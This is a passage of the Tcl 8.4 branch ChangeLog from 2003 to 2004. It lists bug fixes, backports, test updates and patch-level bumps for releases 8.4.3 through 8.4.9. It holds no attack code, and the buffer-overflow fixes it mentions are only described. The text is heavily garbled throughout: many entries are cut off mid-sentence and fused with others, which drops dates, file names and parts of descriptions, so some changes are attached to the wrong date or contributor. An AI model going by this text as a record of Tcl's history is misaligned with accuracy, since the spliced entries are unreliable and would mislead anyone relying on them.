8.4.9 * generic/tcl.h: * tools/tcl.wse.in: * unix/tcl.spec, unix/configure, unix/configure.in: * win/configure, win/configure.in:] 2004-11-23 Don Porter <[email protected]> * generic/tclCmdIL.c (InfoVarsCmd): Corrected segfault in new * tests/info.test (info-19.6): trivial matching branch [Bug 1072654] 2004-11-23 Vince Darley <[email protected]> * generic/tclPathObj.c: fix and new test for [Bug 1043129] in * tests/fileSystem.test: the treatment of backslashes in file join on Windows.-19 Reinhard Max <[email protected]> *** 8.4.8 TAGGED FOR RELEASE *** * unix/installManPage: Classic sed doesn't support | in REs..13 * tests/unixInit.test (7.1): fixed failure when running tests with -tmpdir arg not set to working dir. 2004-11-18 Don Porter <[email protected]> * changes: Final updates for Tcl 8.4.8 release. 2004-11-16 Jeff Hobbs <[email protected]> * unix/tclUnixChan.c (TtySetOptionProc): fixed crash configuring -ttycontrol on a channel. [Bug 1067708] 2004-11-16 Andreas Kupries <[email protected]> * win/makefile.vc: Fixed bug in installation of http 2.5. * win/makefile.bc: Was installed into directory http2.4. * win/Makefile.in: This has been corrected. * unix/Makefile.in: * tools/tcl.wse.in: * tools/tclmin.wse: 2004-11-16 Don Porter <[email protected]> * library/auto.tcl: Updated [tcl_findLibrary] search path to include the $::auto_path. [RFE 695441] 2004-11-16 Donal K. Fellows <[email protected]> * doc/tclvars.n: Mention global variables set by tclsh and wish so they are easier to find. [Patch 1065732] 2004-11-15 Don Porter <[email protected]> *-12 Don Porter <[email protected]> * library/init.tcl: Made [unknown] robust in the case that either of the variables ::errorInfo or ::errorCode gets unset. [Bug 1063707] 2004-11-12 Jeff Hobbs <[email protected]> * generic/tclEncoding.c (TableFromUtfProc): correct crash condition when TCL_UTF_MAX == 6. [Bug 1004065] 2004-11-12 Daniel Steffen <[email protected]> * doc/clock.n: * doc/registry.n: * doc/upvar.n: fixed *roff errors uncovered by running 'make html'. * tools/tcltk-man2html.tcl: added faked support for bullet point lists, i.e. *nroff ".IP \(bu" syntax. Synced other changes from HEAD./tcltest.test: fixed bugs causing failures when running tests with -tmpdir arg not set to working dir. * macosx/Makefile: corrected path to html help inside framework. Prevent parallel make from building several targets at the same time. 2004-11-09 Donal K. Fellows <[email protected]> * doc/catch.n: Clarify documentation on return codes. [Bug 1062647] 2004-11-02 Don Porter <[email protected]> * changes: Updates for Tcl 8.4.8 release.): NaN-equality fix from Miguel Sofer. [Bug 761471] * doc/CrtChannel.3 (Tcl_GetChannelMode): Add synopsis. [Bug 1058446] 2004-10-31 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (InfoGlobalsCmd): * tests/info.test (info-8.4): Strip leading global-namespace specifiers from the pattern argument. [Bug 1057461] 2004-10-30 Miguel Sofer <[email protected]> * generic/tclCmdAH.c (Tcl_CatchObjCmd): removed erroneous comment [Bug 1029518] 2004-10-28 Andreas Kupries <[email protected]> * generic/tclAlloc.c: Fixed [Bug 1030548], a threaded debug * generic/tclThreadAlloc.c: build on Windows now works again. Had to * win/tclWinThrd.c: touch Unix as well. Basic patch by Kevin, * unix/tclUnixThrd.c: with modifications by myself. 2004-10-28 Don Porter <[email protected]> * README: Bumped patch level to 8.4.8 to prepare for * generic/tcl.h: next patch release. * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure: 2004-10-28 Kevin B. Kenny <[email protected]> * generic/tclInt.decls: * unix/tclUnixTime.c (TclpGmtime, TclpLocaltime): * win/tclWinTime.c (TclpGmtime, TclpLocaltime): Changed type signatures of TclpGmtime and TclpLocaltime to accept CONST TclpTime_t throughout, to avoid any possible confusion in pedantic compilers. [Bug 1001319] * generic/tclIntDecls.h: * generic/tclIntPlatDecls.h: Regenerated. 2004-10-27 Don Porter <[email protected]> * generic/tclCmdAH.c (Tcl_FormatObjCmd): Restored missing line from yesterday's 868489 backport that caused failed alloc's on LP64 systems. * tests/appendComp.test: Backport test suite fixes of errors * tests/autoMkindex.test: revealed by -singleproc 1 -debug 1 * tests/exec.test: options to make test. * tests/execute.test: * tests/interp.test: * tests/io.test: * tests/namespace.test: * tests/regexpComp.test: * tests/stringComp.test: * tests/unixInit.test: * tests/winPipe.test: 2004-10-26 Kevin B. Kenny <[email protected]> * generic/tclCmdAH.c (Tcl_FormatObjCmd): Backport a missing bit of the [Bug 868489] fix. * generic/tclObj.c (SetBooleanFromAny): Backport fix for [Bug 1026125] * tests/format.test (format-19.1): Additional regression test for [Bug 868489]. 2004-10-26 Donal K. Fellows <[email protected]> * doc/*.n: Backporting of documentation updates. 2004-10-26 Don Porter <[email protected]> * tests/subst.test (subst-12.3-5): More tests for [Bug 1036649] * tests/compile.test (compile-12.4): Backport test for [Bug 1001997] * tests/timer.test (timer-10.1): Backport test for [Bug 1016167] * tests/tcltest.test (tcltest-12.3,4): Backport setup corrections. * tests/error.test (error-6.3,4,7,9): Backport of some tests. * tests/basic.test (basic-49.*): * tests/namespace.test (namespace-8.7): * tests/init.test (init-2.8): Updated to not rely on http package. * generic/tclThreadTest.c (ThreadEventProc): Corrected subtle bug where the returned (char *) from Tcl_GetStringResult(interp) continued to be used without copying or refcounting, while activity on the interp continued. 2004-10-14 Donal K. Fellows <[email protected]> *-08 Jeff Hobbs <[email protected]> * win/tclWinFile.c (NativeIsExec): correct result of 'file executable' to not be case sensitive. [Bug 954263] 2004-10-05 Don Porter <[email protected]> * generic/tclNamesp.c (Tcl_PopCallFrame): Removed Bug 1038021 workaround. That bug is now fixed. 2004-09-30 Don Porter <[email protected]> * generic/tclNamespace.c (TclTeardownNamespace): Tcl_Obj-ified the * tests/namespace.test (namespace-8.5,6):Var.c (CallVarTraces): Save/restore the flag values * tests/var.test (var-16.1): that define part of the interpreter state during variable traces. [Bug 1038021] 2004-09-30 Miguel Sofer <[email protected]> * tests/subst.test (12.2): test correction. 2004-09-29 Miguel Sofer <[email protected]> * generic/tclBasic.c (Tcl_EvalEx): * tests/subst.test (12.1-2): fix for buffer overflow in [subst], [Bug 1036649]-18 Donal K. Fellows <[email protected]> * generic/tclExecute.c (TEBC-INST_LSHIFT,INST_RSHIFT): Ensure that large shifts end up shifting correctly. [Bug 868467] 2004-09-15 Daniel Steffen <[email protected]> * tests/load.test (load-2.3): adopted fix for failure on darwin from HEAD. 2004-09-14 Don Porter <[email protected]> * generic/tclObj.c (Tcl_GetIntFromObj): Corrected flaw in returning the int value of a wideInteger. [Bug 1027690] Don Porter <[email protected]> * generic/tclNamesp.c (Tcl_ForgetImport): Corrected faulty logic that * tests/namespace.test: relied exclusively on string matching and failed in the presence of [rename]s. [Bug 560297] Also corrected faulty prevention of [namespace import] cycles. [Bug 1017299] 2004-09-08 Kevin B. Kenny <[email protected]> * compat/strftime.c (_conv): Corrected a problem where hour 0 would format as a blank format group with %k. * tests/clock.test (clock-41.1): Added regression test case for %k at the zero hour. 2004-09-07 Kevin B. Kenny <[email protected]> * generic/tclTimer.c: Removed a premature optimisation that attempted to store the assoc data in the client data; the optimisation caused a bug that [after] would overwrite its imports. [Bug 1016167] 2004-09-02 Donal K. Fellows <[email protected]> * doc/lsearch.n: Clarified meaning of -dictionary. [Bug 759545]-08-30 Donal K. Fellows <[email protected]> * generic/tclCmdMZ.c (Tcl_StringObjCmd): Stop [string map] from crashing when its map and input string are the same object. 2004-08-27 Daniel Steffen <[email protected]> * tests/env.test: macosx fixes. 2004-08-19 Donal K. Fellows <[email protected]> * generic/tclScan.c (Tcl_ScanObjCmd, ValidateFormat): Ensure that the %ld conversion works correctly on 64-bit platforms. [Bug 1011860]]. * library/msgcat/pkgIndex.tcl: Bump to msgcat 1.3.3-07-30 Don Porter <[email protected]> *-28 Don Porter <[email protected]> * generic/tclMain.c (Tcl_Main, StdinProc): Append newline only to * tests/basic.test (basic-46.1): incomplete scripts as part of multi-line script construction. Do not add an extra trailing newline to the complete script. [Bug 833150] 2004-07-26 Jeff Hobbs <[email protected]> *** 8.4.7 TAGGED FOR RELEASE *** * tests/io.test (io-61.1): create file in binary mode for x-plat. 2004-07-25 Pat Thoyts <[email protected]> * generic/tclThreadAlloc.c: Moved the tclInt.h include to provide Tcl_Panic which is now required for non-threaded build. 2004-07-22 Don Porter <[email protected]> * tests/eofchar.data (removed): Test io-61.1 now generates its own * tests/io.test: file of test data as needed. 2004-07-21 Don Porter <[email protected]> * win/tclWinDde.c: Bump to dde 1.2.3 to cover changes * library/dde/pkgIndex.tcl: committed on 2004-06-14. * changes: Updated for Tcl 8.4.7-20 Daniel Steffen <[email protected]> * unix/tcl.m4: fixed Darwin autoconf breakage caused by recent CFLAGS reordering. * unix/configure: regen * unix/tclConfig.sh.in: replaced EXTRA_CFLAGS with CFLAGS. * unix/dltest/Makefile.in: replaced EXTRA_CFLAGS with DEFS. * Jeff Hobbs <[email protected]> * unix/Makefile.in, unix/tcl.m4: move (C|LD)FLAGS after their * unix/configure.in, unix/configure: _DEFAULT to allow for env setting to override m4 switches. Consolidate header checks to limit redundancy in configure. (CFLAGS_WARNING): Remove -Wconversion, add -fno-strict-aliasing for gcc builds (need to suppress 3.x type puning warnings). (SC_ENABLE_THREADS): Set m4 to force threaded build when built against a threaded Tcl core. Reorder configure.in for better 64-bit build configuration, replacing EXTRA_CFLAGS with CFLAGS. [Bug 874058] 2004-07-19 Zoran Vasiljevic <[email protected]> * win/tclwinThrd.c: redefined MASTER_LOCK to call TclpMasterLock. Fixes [Bug 987967] Zoran Vasiljevic <[email protected]> * generic/tclEvent.c (NewThreadProc): Backout of changes to fix [Bug 770053]. See SF bugreport for more info. * generic/tclNotify.c (TclFinalizeNotifier): Added conditional notifier finalization based on the fact that an TclInitNotifier has been called for the current thread. This fixes [Bug 770053] again. Hopefully this time w/o unwanted side-effects. 2004-07-14 Andreas Kupries <[email protected]> * generic/tclIO.h (CHANNEL_INCLOSE): New flag. Set in Tcl_Close * generic/tclIO.c (Tcl_UnregisterChannel): while the close callbacks * generic/tclIO.c (Tcl_Close):. [Bug 985869] (mistachkin) 2004-07-13 Jeff Hobbs <[email protected]> * README, generic/tcl.h, tools/tcl.wse.in: bumped to * unix/configure, unix/configure.in, unix/tcl.spec: patchlevel * win/README.binary, win/configure, win/configure.in: 8.4.7 2004-07-13 Zoran Vasiljevic <[email protected]> * generic/tclEvent.c (NewThreadProc): Fixed broken build on Windows caused by missing TCL_THREAD_CREATE_RETURN. This is backported from HEAD. Thnx to Kevin Kenny for spotting this. 2004-07-03 Miguel Sofer <[email protected]> * generic/tclExecute.c (ExprRoundFunc): * tests/expr-old.test (39.1): added support for wide integers to round(); [Bug 908375], reported by Hemang Lavana. 2004-07-02 Jeff Hobbs <[email protected]> * generic/regcomp.c (stid): correct minor pointer size error * generic/tclPipe.c (TclCreatePipeline): Add 2>@1 as a special * tests/exec.test: case redir of stderr to the result output. 2004-07-02 Vince Darley <[email protected]> * tests/fileSystem.test: new tests backported * win/tclWin32Dll.c: compilation fix for VC++5.2 2004-06-29 Donal K. Fellows <[email protected]> * library/safe.tcl: Make sure that the temporary variable is local to the namespace and not inadvertently global. [Bug 981733]: See bug report for more information about what it does. [Bug 770053] *-14 Pat Thoyts <[email protected]> * tests/winDde.test: Fixed -async test * win/tclWinDde.c: Backported the fix from 8.5 to avoid hanging in the presence of applications that do not process Window messages. 2004-06-10 Andreas Kupries <[email protected]> * generic/tclDecls.h: Regenerated on a unix box. The Win/DOS * generic/tclIntDecls.h: EOLs from the last regen screwed up * generic/tclIntPlatDecls.h: compilation with an older gcc. * generic/tclPlatDecls.h: * generic/tclStubInit.c: 2004-06-10: handle warning [Bug 969066] 2004-06-05 Kevin B. Kenny <[email protected]> * generic/tcl.h: Corrected Tcl_WideInt declarations so that the mingw build works again. * generic/tclDecls.h: Changes to the tests for * generic/tclInt.decls: clock frequency in Tcl_WinTime * generic/tclIntDecls.h: so Reinhard Max <[email protected]> * generic/tclEncoding.c: * tests/encoding.test: added support and tests for translating embedded null characters between real nullbytes and the internal representation on input/output. [Bug 949905] Miguel Sofer <[email protected]> * doc/set.n: accurate description of name resolution process, referring to namespace.n for details [Bug 959180] 2004-05-22 Miguel Sofer <[email protected]> * generic/tclVar.c (TclObjUnsetVar2): backported fix [Bug 735335] and new (in tcl8.4) exteriorisations of [Bug 736729] due to the use of tclNsVarNameType obj types. The consequences of [Bug 736729] should be the same as in tcl8.3 and previous versions. The use of tclNsVarNameType objs is still disabled, pending a decision by the release manager. 2004-05-19 Donal K. Fellows <[email protected]> * and the check of its status return, leading to a bizarre error return of {POSIX unknown {No error}}. (Found in unplanned test - no incident logged at SourceForge.). [[this bug amended 2004-07-14]]-17 Kevin B. Kenny <[email protected]> * generic/tclInt.decls: Restored TclpTime_t kludge to all places * generic/tclIntPlatDecls.h: where it appeared before the changes of * unix/tclUnixPort.h 14 May, because use of native time_t in * unix/tclUnixTime.h its place requires the 8.5 header * win/tclWinTime.h: reforms. [Bug 955146] 2004-05-17 Donal K. Fellows <[email protected]> * doc/OpenFileChnl.3: Documented type of 'offset' argument to Tcl_Seek was wrong. [Bug 953374] 940278]-10 David Gravereaux <[email protected]> * win/tclWinPipe.c (BuildCommandLine): Append a space when the path got primed. (TclpCreateProcess): When under NT, with no console, and executing a DOS application, the path priming does not need an ending space as BuildCommandLine() will append one for us. 2004-05-07 Miguel Sofer <[email protected]> * doc/unset.n: added upvar.n to the "see also" list 2004-05-05. * generic/tclEncoding.c: Added FreeEncoding(systemEncoding) in TclFinalizeEncodingSubsystem because its ref count was incremented in TclInitEncodingSubsystem. * included, too. [Patch 858493] Also added DisableThreadLibraryCalls() for the DLL_PROCESS_ATTACH case. We're not interested in knowing about DLL_THREAD_ATTACH, so disable the notices. *. (SocketEventProc): connect errors should fire both the readable and writable handlers because this is how it works on UNIX. [Bug 794839] * win/coffbase.txt: Added the tls extension to the list of preferred load addresses.-04 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c (Tcl_FSChdir): Work-around crash condition * tests/winFCmd.test (winFCmd-16.12): triggered when $HOME is volumerelative (ie 'C:'). * tests/fileName.test (filename-12.9): use C:/ instead of the first item in file volumes - that's usually A:/, which for most will have nothing in it. 2004-05-04 Don Porter <[email protected]> * tests/tcltest.test: Test corrections for Mac OSX. Thanks to Steven Abner (tauvan). [Bug 947440] 2004-05-03 Andreas Kupries <[email protected]> Applied [SF Tcl Patch 868853], fixing a mem leak in TtySetOptionProc. Report and Patch provided by Stuart Cassoff <[email protected]>.-23 Andreas Kupries <[email protected]> * generic/tclIO.c (Tcl_SetChannelOption): Fixed [Bug 930851]. When changing the eofchar we have to zap the related flags to prevent them from prematurely aborting the next read. 2004-04-07 Jeff Hobbs <[email protected]> * win/configure: * win/configure.in: define TCL_LIB_FLAG, TCL_BUILD_LIB_SPEC, TCL_LIB_SPEC and TCL_PACKAGE_PATH in tclConfig.sh. 2004-04-06 Don Porter <[email protected] Don Porter <[email protected]> * tests/tcltest.test: Corrected constraint typos: "nonRoot" -> "notRoot". Thanks to Steven Abner (tauvan). [Bug 928353] 2004-03-31 Don Porter <[email protected]> * doc/msgcat.n: Clarified message catalog file encodings. [Bug 811457] * library/msgcat/msgcat.tcl ([mcset], [ConvertLocale], [Init]):.3.2. 2004-03-31 Donal K. Fellows <[email protected]> * generic/tclObj.c (HashObjKey): Make sure this hashes the whole string rep of the object, instead of missing the last character. 2004-03-29 Jeff Hobbs <[email protected]> * generic/tclInt.h: * generic/tclEncoding.c (TclFindEncodings, Tcl_FindExecutable): * mac/tclMacInit.c (TclpInitLibraryPath):-21 Jeff Hobbs <[email protected]> * win/tclWinInt.h: define VER_PLATFORM_WIN32_CE if not already set. * win/tclWinInit.c (TclpSetInitialEncodings): recognize WIN32_CE as a unicode (WCHAR) platform. 2004-03-15. Fixed in HEAD on 2003-05-09, but backport to 8-4-branch was wrongly omitted; re-reported as [Bug 916795] by Roy Terry, diagnosed by dgp. 2004-03-08 Vince Darley <[email protected]> * generic/tclFileName.c: Fix to 'glob -path' near the root * tests/fileName.test: of the filesystem. [Bug 910525] 2004-03-01 Don Porter <[email protected]> *** 8.4.6 TAGGED FOR RELEASE *** * unix/tcl.m4 (SC_CONFIG_CFLAGS): Allow 64-bit enabling on IRIX64-6.5* systems. [Bug 218561] * unix/configure: autoconf-2.13 * generic/tclCmdMZ.c (TclCheckInterpTraces): The TIP 62 * generic/tclTest.c (TestcmdtraceCmd): implementation introduced a * tests/basic.test (basic-39.10): bug by testing the CallFrame level instead of the iPtr->numLevels level when deciding what traces created by Tcl_Create(Obj)Trace to call. Added test to expose the error, and made fix. [Request 4625 * tests/exec.test: contain Tcl-special chars like { or [. * tests/io.test: Should help us sort out Tcl Bug 554068. * tests/pid.test: * tests/socket.test: * tests/source.test: * tests/unixInit.test: 2004-02-25 Donal K. Fellows <[email protected]> * unix/tclUnixChan.c (TcpGetOptionProc): Stop memory leak with very long hostnames. [Bug 888777] 2004-02-25 David Gravereaux <[email protected]> * tests/winPipe.test: * win/tclWinPipe.c: backport of BuildCommandLine changes to mirror msvcrt's parse_cmdline() rules of quoting. 2004-02-19> (reverted due to test failures on Solaris, but not Win/Lin :/) * generic/tclIOUtil.c: backport of rewrite of generic file normalization code to cope with links followed by '..'. [Bug 849514], and parts of [859251] * tests/unixInit.test: unixInit-7.1 * unix/tclUnixInit.c (TclpInitPlatform): ensure the std fds exist to prevent crash condition [Bug 772288] 2004-02-16 Jeff Hobbs <[email protected]> * generic/tclCmdMZ.c (TclTraceExecutionObjCmd) (TclTraceCommandObjCmd): fix possible mem leak in trace info. 2004-02-12 Jeff Hobbs <[email protected]> * README: update patchlevel to 8.4.6 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure, unix/configure.in, unix/tcl.spec: * win/README.binary, win/configure, win/configure.in: * unix/tcl.m4: update HP-11 build libs setup 2004-02-06 Don Porter <[email protected]> * doc/clock.n: Removed reference to non-existent [file ctime]. 2004-02-04 Don Porter <[email protected]> *. [Bug 405995] 2004-01-13 Don Porter <[email protected]> *-09 Vince Darley <[email protected]> * generic/tclIOUtil.c: fix to infinite loop in TclFinalizeFilesystem. [Bug 873311] 2003-12-17 Daniel Steffen <[email protected]> * generic/tclBinary.c (DeleteScanNumberCache): fixed crashing bug when numeric scan-value cache contains NULL value. 2003-12-17 Zoran Vasiljevic <[email protected]> * generic/tclIOUtil.c: fixed 2 memory (object) leaks. This fixes [Bug 839519] 2003-12-12 Vince Darley <[email protected]> * generic/tclCmdAH.c: fix to normalization of non-existent user name ('file normalize ~nobody') [Bug 858937] 2003-12-09 Donal K. Fellows <[email protected]> * unix/tclUnixPort.h: #ifdef'd out declarations of errno which * tools/man2tcl.c: are known to cause problems with recent glibc. [Bug 852369] 2003-12-03 Don Porter <[email protected]> * generic/tcl.h: Bumped patch level to 8.4.5.1 to distinguish * unix/configure.in: CVS snapshots from 8.4.5 release. * unix/tcl.spec: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure:meier for the report. [Bug 851747] 2003-12-01 Miguel Sofer <[email protected]> * doc/lset.n: fix typo [Bug 852224] 2003-11-21 Don Porter <[email protected]> *** 8.4.5 TAGGED FOR RELEASE *** * tests/windFCmd.test (winFCmd-16.10): Corrected failure to initialize variable $dd that caused test suite failure. 2003-11-20 Miguel Sofer <[email protected]> * generic/tclVar.c: fix flag bit collision between LOOKUP_FOR_UPVAR and TCL_PARSE_PART1 (deprecated) [Bug 835020] 2003-11-20 Vince Darley <[email protected]> * generic/tclIOUtil.c: * tests/winFCmd.test: fix to [Bug 845778] - Infinite recursion on [cd] (Windows only bug). 2003-11-18 Jeff Hobbs <[email protected]> * changes: updated for 8.4.5 release 2003-11-17 Don Porter <[email protected]> * generic/regcomp.c: Backported regexp bug fixes and tests. Thanks * generic/tclTest.c: to Pavel Goran and Vince Darley. * tests/reg.test: [Bugs 230589, 504785, 505048, 703709, 840258] 2003-11-10 Don Porter <[email protected]> * tests/unixInit.test (unixInit-2.10): re-enabled. * unix/tclUnixInit.c (TclpInitLibraryPath): Alternative fix * win/tclWinInit.c (TclpInitLibraryPath): for [Bug 832657] that should not run afoul of startup constraints. * library/dde/pkgIndex.tcl: Added safeguards so that registry * library/reg/pkgIndex.tcl: and dde packages are not offered * win/tclWinDde.c: on non-Windows platforms. Bumped to * win/tclWinReg.c: registry 1.1.3 and dde 1.2.2. 2003-11-06 Jeff Hobbs <[email protected]> * tests/unixInit.test (unixInit-2.10): mark as knownBug * generic/tclEncoding.c (TclFindEncodings): revert patch from 2003-11-05. It wasn't valid in the sensitive startup init phase and broke Windows from working at all. 2003-11-07 Daniel Steffen <[email protected]> * macosx/Makefile: optimized builds define NDEBUG to turn off ThreadAlloc range checking. 2003-11-05 Don Porter <[email protected]> * generic/tclEncoding.c (TclFindEncodings): Normalize the path of the executable before passing to TclpInitLibraryPath() to avoid buggy handling of paths containing "..". [Bug 832657] * tests/unixInit.test (unixInit-2.10): New test for fixed bug. 2003-11-04 Daniel Steffen <[email protected]> * macosx/Makefile: added 'test' target. 2003-10-31 Vince Darley <[email protected]> * generic/tclTest.c: fix test suite memory leak (backport error) * unix/tclUnixFile.c: ensure translated path (required for correct error messages) is freed in both code paths.. 2003-10-22 Andreas Kupries <[email protected]> *-22 Andreas Kupries <[email protected]> * generic/tclIOUtil.c (FsListMounts, FsAddMountsToGlobResult): New functions. See below for context. (Tcl_FSMatchInDirectory): Modified to call on the new functions (above) to handle the mountpoints in the glob'bed directory correctly. Part of the patch by Vincent Darley to solve the [Bug 800106] for the 8.4.x series. * generic/tcl.h (TCL_GLOB_TYPE_MOUNT): New definition. Part of the patch by Vincent Darley to solve [Bug 800106] for the 8.4.x series. 2003-10-22 Donal K. Fellows <[email protected]> * generic/tclCmdAH.c (Tcl_FileObjCmd): Changed FILE_ prefix for option enumeration to FCMD_ to prevent collision with symbols [email protected]> * win/tclWinPipe.c (BuildCommandLine): Applied the patch coming with [Bug 805605] to the code, fixing the incorrect use of ispace noted by Ronald Dauster <[email protected]>. 2003-10-14 David Gravereaux <[email protected]> * win/tclAppInit.c (sigHandler): Punt gracefully if exitToken has already been destroyed. 2003-10-13 Vince Darley <[email protected]> * generic/tclCmdMZ.c: * tests/regexp.test: fix to [Bug 823524] in regsub; added three new tests. 2003-10-12 Jeff Hobbs <[email protected]> * unix/tclUnixTest.c (TestalarmCmd): don't bother checking return value of alarm. [Bug 664755] (english). Thanks to Yahalom Emet. [Bug 760947]/exec.test: Corrected temporary file management * tests/fileSystem.test: issues uncovered by -debug 1 test * tests/io.test: operations. Also backported some * tests/ioCmd.test: other fixes from the HEAD. */cmdMZ.test: Updated [package require tcltest] lines to * tests/fileSystem.test: indiciate that these test files * tests/notify.test: use features of tcltest 2. [Bug 706114] * tests/parseExpr.test: * tests/unixNotfy.test: 2003-10-06 Vince Darley <[email protected]> * generic/tclFileName.c: * generic/tclIOUtil.c: backport of volumerelative file normalization and 'file join' inconsistency fixes [Bug 767834, 813273]. 2003-10-04-03 Vince Darley <[email protected]> * tests/fileName.test: * tests/winFCmd.test: * doc/FileSystem.3: backported various test and documentation changes from HEAD. Backport of actual code fixes to follow. 2003-10-02 Don Porter <[email protected]> * README: Bumped patch level to 8.4.5 to prepare * generic/tcl.h: for next patch release. * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure: * library/http/http.tcl: Bumped to http 2.4.5 * library/http/pkgIndex.tcl: 2003-10-01 Daniel Steffen <[email protected]> * macosx/Makefile: fixed redo prebinding bug when DESTDIR="". * mac/tclMacResource.c: fixed possible NULL dereference (bdesgraupes). 2003-09-29 Don Porter <[email protected]> * generic/tclBasic.c (CallCommandTraces): Added safety bit * tests/trace.test: masking to prevent any of the bit values TCL_TRACE_*_EXEC from leaking into the flags field of any Command struct. This does not fix [Bug 811483] but helps to contain some of its worst symptoms. Also backported the corrections to test trace-28.4 from Vince Darley. 2003-09-29 Donal K. Fellows <[email protected]> *-23 Don Porter <[email protected]> * generic/tclCmdMZ.c: Fixed [Bug 807243] where * tests/trace.test (trace-31,32.*): the introspection results of both [trace info command] and [trace info execution] were getting co-mingled. Thanks to Mark Saye for the report. * library/init.tcl (auto_load, auto_import): Expanded Eric Melski's 2000-01-28 fix for [Bug 218871] to all potentially troubled uses of [info commands] on input data, where glob-special characters could cause problems.-10 Don Porter <[email protected]> * library/opt/optparse.tcl: Overlooked dependence of opt 0.4.4 * library/opt/pkgIndex.tcl: on Tcl 8.2. Bumped to opt 0.4.4.1. 2003-09-01 Zoran Vasiljevic <[email protected]> * generic/tclIOUtil.c: backported fix from HEAD [Bug 788780]-06 Jeff Hobbs <[email protected]> * win/tclWinInit.c: recognize amd64 and ia32_on_win64 cpus and Windows CE platform.-24 Reinhard Max <[email protected]> * library/package.tcl: Fixed a typo that broke pkg_mkIndex -verbose. * tests/pkgMkIndex.test: Added a test for [pkg_mkIndex -verb): Backported fix for [Bug 775976] which causes the registry set command to fail when built with VC7. * library/reg/pkgIndex.tcl: Incremented the version to 1.1.2. 2003-07-21 Jeff Hobbs <[email protected]> *** 8.4.4 TAGGED FOR RELEASE *** * changes: updated for 8.4.4 release> * generic/tclIOUtil.c: correct MT-safety issues with filesystem records. [Bug 753315] (vasiljevic) * library/http/pkgIndex.tcl: merged to v2.4.4 from head * library/http/http.tcl: add support for user:pass info in URL. * tests/http.test: [Bug 759888] (shiobara) 2003-07-18 Don Porter <[email protected]> * generic/tclBasic.c: Corrected several instances of unsafe * generic/tclCompile.c: truncation of UTF-8 strings that might break * generic/tclProc.c: apart a multi-byte character. [Bug 760872] * library/init.tcl: * tests/init.test: * using * doc/CrtTrace.3: "null" everywhere to refer to the character * doc/Encoding.3: '\0', and using "NULL" everywhere to refer to * doc/Eval.3: the value of a pointer that points to nowhere. * doc/GetIndex.3: Also dropped references to ASCII that are no * doc/Hash.3: longer true, and standardized on the * doc/LinkVar.3:> * macosx/Makefile: added var to allow overriding of tclsh used during html help building (Landon Fuller). 2003-07-16 Mumit Khan <[email protected]> * generic/tclIOUtil) 2003-07-16 Donal K. Fellows <[email protected]> * doc/CrtSlave.3 (Tcl_MakeSafe): Updated documentation to strongly discourage use. IMHO code outside the core that uses this function is a bug... [Bug 655300] 2003-07-16 Jeff Hobbs <[email protected]> * generic/tcl.h: Add recognition of -DTCL_UTF_MAX=6 on the * generic/regcustom.h: make/makefile.vc: Ditto. *-07-16 Don Porter <[email protected]> * generic/tclFileName.c (Tcl_GlobObjCmd): [Bug 771840] * generic/tclIOUtil: Added some examples from David Welton [Patch 763312]. * README: Bumped patch level to 8.4.4 in anticipation * generic/tcl.h: of another patch release. * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure: * generic/tclCompCmds.c (TclCompileIfCmd): Prior fix of Bug 711371 on 2003-04-07 introduced a buffer overflow. Corrected. [Bug 771613] 2003-07-15 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (SortCompare): Cleared up confusing error message. [Bug 771539] 2003-07-15 Daniel Steffen <[email protected]> *-23 Vince Darley <[email protected]> * generic/tclFCmd.c: fix to bad error message when trying to do 'file copy foo ""'. [Bug 756951] * tests/fCmd.test: added two new tests for the bug. *> * generic/tclCmdMZ.c: * tests/regexp.test: fixing of bugs related to regexp and regsub matching of empty strings. Addition of a number of new tests. 2003-06-10 Miguel Sofer <[email protected]> * generic/tclBasic.c: * generic/tclExecute.c: let TclEval Don Porter <[email protected]> * tests-22 Daniel Steffen <[email protected]> *** 8.4.3 TAGGED FOR RELEASE *** *-20 Jeff Hobbs <[email protected]> * changes: updated for 8.4.3 * unix/Makefile.in: do not run autoconf during 'make dist' as the configure is now a CVS-maintained file and should be up-to-date.. 2003-05-16 Daniel Steffen <[email protected]> * macosx/Tcl.pbproj/project.pbxproj: updated copyright year. 2003-05-15 Jeff Hobbs <[email protected]> * win/tclWinFile.c (TclpMatchInDirectory): revert glob code to r1.44 as 2003-04-14 optimizations broke Windows98 glob'ing. * README: bumped version to 8.4.3 * generic/tcl.h: * macosx/Tcl.pbproj/project.pbxproj: * tools/tcl.wse.in: * unix/configure: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure: * win/configure.in: *): Values which can't be anything but wide shouldn't be demoted to long. [consequence of HEAD fixes for] * generic/tclEnv.c (TclUnsetEnv): Another putenv() copy behavior problem repaired when compiling on windows and using microsoft's runtime. [Bug 736421] (gravereaux) 2003-05-13 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c: add decl for FsThrExitProc to suppress warnings "id" * generic/tclDecls.h: Zoran Vasiljevic <[email protected]> * unix/tclUnixThrd.c: corrected [Bug 723502] 2003-05-10 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c: ensure cd is thread-safe. [Bug 710642] (vasiljev-05 Don Porter <[email protected]> * grammar and spelling. 2003-04-29. (Bug has been around at least since Tcl 8.3.) * tests/fileName.test: added test for the above bug.> * generic/tclExecute.c (ExprCallMathFunc): remove incorrect extraneous cast from Tcl_WideAsDouble. 2003-04-18 Donal K. Fellows <[email protected]> * doc/open.n: Moved serial port options from [fconfigure] * doc/fconfigure.n:-15 Kevin Kenny <[email protected]> * win/tclWinTime.c: Corrected use of types to make compilation compatible with VC++5.> Merged various bug fixes from current cvs head: * tests/cmdAH.test: better fix to: Some re-arrangement of code to bring it closer to CVS HEAD. No functional changes. * tests/fCmd.test: * win/tclWinFile.c: added some filesystem optimisation to the 'glob' implementation, and some new tests. * tests/winFile.test: * tests/ioUtil.test: * tests/unixFCmd.test: renumbered tests with duplicate numbers. [Bug 710361] 2003-04-12 Kevin Kenny <[email protected]> * tests/clock.test:/tclObj.c (tclWideIntType, TclInitObjSubsystem): (SetBooleanFromAny): 